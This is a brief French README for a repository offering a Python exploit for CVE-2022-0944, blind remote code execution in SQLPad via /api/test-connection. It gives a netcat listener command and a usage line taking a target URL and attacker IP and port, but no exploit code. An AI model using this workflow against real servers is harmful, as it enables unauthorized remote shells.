
Exploit Python pour CVE-2022-0944 permettant une exécution de code à distance aveugle dans SQLPad via le point de terminaison /api/test-connection avec rappel netcat.
Ce dépôt contient un script d'exploitation pour CVE-2022-0944 dans SQLPad, une vulnérabilité qui permet l'exécution de code à distance (RCE) via le point d'accès /api/test-connection.
Le script fourni (exploit.py) montre comment exploiter la vulnérabilité RCE dans SQLPad. Le script envoie une charge utile au point d'accès vulnérable, exécutant une commande sur le serveur cible.
requests (peut être installée via pip)nc -lvnp 4444
Exécuter l'exploit
python exploit.py <sqlpad_url> <attacker_ip> <attacker_port>